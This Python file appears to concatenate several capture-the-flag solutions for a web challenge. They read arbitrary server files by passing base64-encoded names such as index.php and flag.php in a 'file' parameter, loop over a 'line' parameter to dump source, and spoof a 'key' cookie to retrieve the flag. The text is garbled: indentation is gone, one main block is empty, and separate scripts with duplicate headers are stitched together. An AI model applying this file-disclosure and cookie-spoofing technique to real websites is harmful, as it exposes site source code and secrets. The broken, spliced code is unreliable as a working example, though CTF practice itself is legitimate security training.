# -*- coding: utf-8 -*-
# version: Python3.X
__author__ = '__L1n__w@tch'
# url: http://ctf.idf.cn/game/web/40/index.php?line=&file=ZmxhZy50eHQ
# 思路:
# 1. 看原始url,里面的file=,怀疑是base64,试一下, 加上2个等于号解密得到flag.txt
# 2. 试一下获取index.php的内容
# 3. 从index.php源码知道要获取flag.php的内容,同时得加个cookie["key"]
import base64
import requests
def main():
index_php = get_index_php()
flag_php = get_flag_php()
def get_flag_php():
print("Start to get flag.php: ")
flag_source_code = str()
cookies = {"key": "idf"}
file = base64.b64encode(b"flag.php").decode("utf8")
url = "http://ctf.idf.cn/game/web/40/index.php?line={}&file={}".format(0, file)
flag_source_code += requests.get(url, cookies=cookies).text
return flag_source_code
def get_index_php():
print("Start to get index.php: ")
source_code = str()
index_url = base64.b64encode(b"index.php").decode("utf8")
for i in range(20):
url = "http://ctf.idf.cn/game/web/40/index.php?line={}&file={}".format(i, index_url)
response = requests.get(url)
source_code += response.text
return source_code
if __name__ == "__main__":
import urllib.request
def url_open( url ) :
req = urllib.request.Request( url )
response = urllib.request.urlopen( url )
html = response.read()
return html
def download() :
for i in range( 20 ) :
url = 'http://ctf.idf.cn/game/web/40/index.php?line=' + str( i ) + '&file=aW5kZXgucGhw'
html = url_open( url )
html = html.decode( 'utf-8' )
print( html,end=' ' )
if __name__ == '__main__' :
# -*- coding: utf-8 -*- # #用中文字符改变编码方式为UTF-8
import requests #调用url、cookie操作 文件操作的库
import sys
cookies = {'key' : 'idf'} #设置cookies为key值为idf 即cookies欺骗
for i in range(0,3): #循环打开网页并抓取网页文本信息存入本地
url="http://ctf.idf.cn/game/web/40/index.php?line=" + \
str(i) + "&file=ZmxhZy5waHA="
wp = requests.get(url, cookies=cookies)
print( wp.text )
with open( './flag.txt','a+' ) as f :
print( f.tell() )
f.seek( 0,0 )
f.write( wp.text )
print("get flag success")